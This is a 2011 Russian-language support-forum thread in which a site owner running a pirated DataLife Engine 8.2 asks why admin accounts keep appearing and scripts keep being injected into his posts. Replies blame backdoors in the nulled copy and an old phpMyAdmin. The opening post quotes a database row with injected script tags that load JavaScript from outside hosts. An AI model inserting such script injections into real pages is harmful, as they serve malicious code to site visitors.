TheEd 0 Опубликовано: 5 марта 2011 Рассказать Опубликовано: 5 марта 2011 Уважаемые формчане! Сайт на данный момент на движке DLE 8.2, обнулённом (в данный момент оплачиваю лицензию с тех.поддержкой, просьба не пинать ногами). Сайт - www.goukkemk.ru Регулярно на сайте заводится юзер с правами администратора + во всех постах появляются скрипты наподобие следующего (кусок из бэкапа): INSERT INTO `dle_post` VALUES (4, 'MC', '2007-09-01 14:08:00', '<div style=\"text-align: justify;\"> Текст новости<br /></div><script src=\"http://picturevk.msk.ru/b9f5571cd1fbef878222491357321e57.js\" type=\"text/javascript\"></script><script src=\"http://mypic.msk.ru/224a46a1ca46911c74859ef0bd1190f1.js\" type=\"text/javascript\"></script><script src=\"http://mypic.msk.ru/4f4348dc2a8dafaff9730042aff1c715.js\" type=\"text/javascript\"> и т.д. Один раз вручную вычищал весь сайт, убирал эти скрипты (даже программу написал, чтобы вручную из бэкапа не удаять), бла опять всё на месте!!! Новости на сайте все закрыты для комментариев, т.о. скрипт добавить юзвери не могут. Однако беспокоит появление непрошенных админов. Подскажите, как они могут появляться, где искать дыры, а также как запретить юзерам при добавлении комментариев использовать скрипты в HTML? Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 5 марта 2011 Рассказать Опубликовано: 5 марта 2011 Лучше всего обновиться на актуальную версию или, во всяком случае, скачайте с оф сайта вашу версию движка и активируйте... На ваш сайт антивирус даже не дает зайти - "сайт заражен". Если нулл (даже при наличии лицензии), то нет никакой гарантии, что нуллеры не оставили в движке лазейки... А быть может все что угодно... Версия phpmyadmin не актуальная (были дыры там тоже), измененные файлы на сервере, пароли своровали, собственный компьютер заражен, например.. Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 5 марта 2011 Рассказать Опубликовано: 5 марта 2011 Не перестают меня удивлять люди, как у них все нормально, так на других им наплевать и на приобретение лицензии им наплевать, а как "петух за одно место клюнет", так сразу прошу не пинайте, лицензию оплачиваю и т.д. и т.п. Ни стыда, ни совести. Читайте http://forum.dle-news.ru/index.php?showtopic=54867&view=findpost&p=268715 у вас тоже самое плюс бэкдоры от нелегальной копии, поэтому на сайте может быть вообще что угодно. Доступ на форуме заблокирован за использование нелегальной копии скрипта, и помощи здесь ждать и просить не стоит. Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения